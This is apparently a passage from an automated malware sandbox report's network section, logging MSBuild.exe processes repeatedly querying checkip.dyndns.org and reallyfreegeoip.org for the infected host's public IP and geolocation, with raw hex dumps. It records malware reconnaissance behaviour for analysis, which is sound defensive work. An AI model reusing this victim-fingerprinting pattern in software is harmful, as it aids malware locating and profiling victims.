                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:49.804191113 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:50.287190914 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 6774ba637e696eb5236d2d27c6ea0817
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:50.288029909 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 6774ba637e696eb5236d2d27c6ea0817
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.656856193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:47.930090904 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:48.767699003 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 75d2eb0863dfa30064a8f3adc4425d96
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.656864193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:49.571244955 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:50.397782087 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0bf1e9ffc9a964fe0f4062f70afc791f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.656874193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:51.085011005 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:51.950792074 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 605c7a2afba1eeb6a86a98f440094bd8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.656875193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:51.183412075 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:53.052979946 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 63566baf086c48951ee19babaeb7a8b3
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.656885193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:52.841434002 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:53.996678114 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:53 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c252102cb8a2b483542c8a98a34e8c1f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:53.997026920 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:53 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c252102cb8a2b483542c8a98a34e8c1f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.656892193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:54.171794891 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:54.997239113 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 44092ac742e9aa86fa6aa8eed6e99c98
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.656897193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:54.808233976 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:55.676589966 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:55 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 827dc65658d87c7ed3a40f118841dad2
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.656905193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:55.782998085 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:56.649746895 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b3ce29180a52de8e36971e9df2165769
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.656910193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:56.483591080 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:57.540529966 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:57 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f89639524acf1d027d2925d18fb18706
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:57.564851046 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:57 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f89639524acf1d027d2925d18fb18706
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.656919193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:58.370336056 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:59.215281963 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: bc76cb85d5f61dc84cd8a5309c614270
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.656927193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:03:00.053035021 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:03:00.894479990 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:03:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: de5e66bd0526c046a18a12ec20106a7c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.656827188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:44 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:45 UTC1215INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:45 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38156
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VeNn0mvBlZINM2ffsWWve2308gznsL2gCk3j50fa996lZNA38sGyhWcUuK6bb2W8nDiP%2B1yLB5qm3Vo0RU02WR8AxrYwRbXxyUWrNWVBfbK4nDheGF0RdIy63ALmgydh33iDYU%2BW"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f47df0b144a-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1268&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2169288&cwnd=219&unsent_bytes=0&cid=50afbfb305127c66&ts=243&x=0"
                                              2024-11-06 16:02:45 UTC154INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
                                              2024-11-06 16:02:45 UTC205INData Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.656834188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:46 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:02:46 UTC1211INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:46 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868
                                              x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DEN52-C1
                                              x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 4504
                                              Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F8rqNktuiSqql3wr67LexbUi2wy7fiEIZUOG2IuLqgTPuWb1VpeSvDzrKknfuZkCH0g7Yirf7uwBFBGAutSrp5nxSXkB7rBPNRq67u0421WzZU2uBB%2B5kBxsyY3xajbUhAv6kvl2"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f4f0c7a79a4-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=18889&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153008&cwnd=32&unsent_bytes=0&cid=fe16216eafd64245&ts=211&x=0"
                                              2024-11-06 16:02:46 UTC158INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
                                              2024-11-06 16:02:46 UTC201INData Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.656849188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:47 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:47 UTC1213INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:47 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
